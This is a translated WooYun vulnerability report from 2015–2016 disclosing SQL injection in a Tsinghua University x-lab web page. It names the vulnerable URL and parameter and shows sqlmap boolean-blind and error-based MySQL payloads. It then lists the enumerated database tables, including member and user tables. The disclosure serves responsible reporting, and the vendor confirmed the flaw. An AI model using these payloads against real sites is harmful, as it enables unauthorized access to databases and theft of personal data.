
Vulnerability Summary

Bug ID: wooyun-2015-0156243

Title: SQL injection vulnerability in a Tsinghua University platform

Vendor: Tsinghua University

Author: 路人甲

Submitted: 2015-11-27 10:48

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org



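Vulnerability Details

Disclosure status:

2015-11-27: Details sent to the vendor; awaiting vendor handling
2015-11-27: Vendor has confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in relevant fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Detailed description: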

http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=projectshow&c=nurture&id=229 AND 8585=8585
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: a=projectshow&c=nurture&id=229 AND (SELECT 4122 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(4122=4122,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: x-lab
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| zcn_partner | 7654 |
| zcn_users_log | 6164 |
| zcn_cirf | 4364 |
| zcn_bm | 3529 |
| zcn_mailinglist | 2420 |
| zcn_eir_time | 2248 |
| zcn_members | 1612 | // users
| zcn_project | 892 |
| zcn_bangzu | 775 |
| zcn_eir_yy | 329 |
| zcn_place | 274 |
| zcn_stat_active | 264 |
| zcn_project_receive | 257 |
| zcn_project_cup | 254 |
| zcn_companies_registry | 214 |
| zcn_voice | 213 |
| zcn_cirf_class | 194 |
| zcn_newslettercon | 167 |
| zcn_zt | 164 |
| zcn_eir_addtime | 155 |
| zcn_project_excellent | 137 |
| zcn_top10 | 133 |
| zcn_type_list | 121 |
| zcn_message | 119 |
| zcn_train | 116 |
| zcn_eir | 101 |
| zcn_zwxx | 48 |
| zcn_zhaomu | 44 |
| zcn_links | 38 |
| zcn_hr | 37 |
| zcn_menus | 36 |
| zcn_type_class | 35 |
| zcn_slider | 29 |
| zcn_president_cup_activity | 27 |
| zcn_project_assess | 23 |
| zcn_users | 20 |
| zcn_video | 20 |
| zcn_zwxx_class | 20 |
| zcn_newsletter | 18 |
| zcn_president_cup | 17 |
| zcn_advice | 14 |
| zcn_articles | 13 |
| zcn_mail_template | 12 |
| zcn_email_queue | 10 |
| zcn_fuwu | 10 |
| zcn_kcxx | 9 |
| zcn_project_class | 9 |
| zcn_cm_cd | 8 |
| zcn_gzf | 5 |
| zcn_users_class | 5 |
| zcn_video_class | 5 |
| zcn_kcxx_class | 4 |
| zcn_links_class | 4 |
| zcn_xmxx | 4 |
| zcn_about | 3 |
| zcn_adflash | 3 |
| zcn_articles_class | 3 |
| zcn_cm_grp_cd | 3 |
| zcn_project_story | 3 |
| zcn_member_video_comment | 1 |
| zcn_network | 1 |
+----------------------------+---------+


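Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-11-27 15:04

Vendor reply:

Thanks for the reminder; we will fix it as soon as possible.

Latest status:

None yet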